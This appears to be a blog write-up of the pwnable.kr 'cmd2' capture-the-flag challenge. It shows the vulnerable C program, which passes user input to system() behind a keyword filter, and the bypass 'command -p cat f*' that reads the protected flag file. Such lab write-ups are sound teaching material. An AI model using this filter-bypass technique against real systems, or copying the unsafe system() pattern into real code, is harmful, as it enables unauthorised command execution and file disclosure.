---
layout:     post
title:      "Pwnable.kr - cmd2"
description: "Once again we're going to exploit simple command filter."
date:       2018-05-28 0:00:00
author:     "W3ndige"
permalink: /:title/
category: 'Pwnable'
---

Start by connecting to the server, with the password from the previous challenge.

{% highlight bash %}
[w3ndige@main ~]$ ssh cmd2@pwnable.kr -p2222
cmd2@pwnable.krs password:
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    /
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|

- Site admin : daehee87.kr@gmail.com
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
Last login: Mon May 28 01:22:41 2018 from 203.229.187.102
cmd2@ubuntu:~$ ls -la
total 40
drwxr-x---  5 root cmd2     4096 Oct 23  2016 .
drwxr-xr-x 87 root root     4096 Dec 27 23:17 ..
d---------  2 root root     4096 Jul 14  2015 .bash_history
-r-xr-sr-x  1 root cmd2_pwn 8794 Dec 21  2015 cmd2
-rw-r--r--  1 root root      586 Dec 21  2015 cmd2.c
-r--r-----  1 root cmd2_pwn   30 Jul 14  2015 flag
dr-xr-xr-x  2 root root     4096 Jul 21  2015 .irssi
drwxr-xr-x  2 root root     4096 Oct 23  2016 .pwntools-cache
{% endhighlight %}

Now we can view the source code of the challenge.

{% highlight c %}
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "=")!=0;
	r += strstr(cmd, "PATH")!=0;
	r += strstr(cmd, "export")!=0;
	r += strstr(cmd, "/")!=0;
	r += strstr(cmd, "`")!=0;
	r += strstr(cmd, "flag")!=0;
	return r;
}

extern char** environ;
void delete_env(){
	char** p;
	for(p=environ; *p; p++)	memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
	delete_env();
	putenv("PATH=/no_command_execution_until_you_become_a_hacker");
	if(filter(argv[1])) return 0;
	printf("%s\n", argv[1]);
	system( argv[1] );
	return 0;
}
{% endhighlight %}

As we can see, logic of the challenge is mostly the same as in the previous one. But in addition, we have more filters to bypass - especially `\` character which was used in our previous exploit.

Firstly, I've noticed that quite easy way to get to the flag is to use an wildcard. Something like `cat fla*` will allow us to view the flag, as it's the only file with such a name. But how to bypass the slash?

After that let's search how exactly commands are executed with `system()` command. From [man pages](http://man7.org/linux/man-pages/man3/system.3.html), we can see that this command uses `sh` to execute a command in this particular way `execl("/bin/sh", "sh", "-c", command, (char *) 0);`

Now we can resaerch  information about `sh` in order to find some help. Another [man page](https://www.freebsd.org/cgi/man.cgi?query=sh&sektion=&n=1) gives us something interesting. Command `command [-p] [utility [argument ...]]` with `-p` option allows us to search using a default value of PATH. It is guaranteed to find all of the standard utilities.

{% highlight bash %}
cmd2@ubuntu:~$ ./cmd2 "command -p cat f*"
command -p cat f*
FuN_w1th_5h3ll_v4riabl3s_haha
{% endhighlight %}
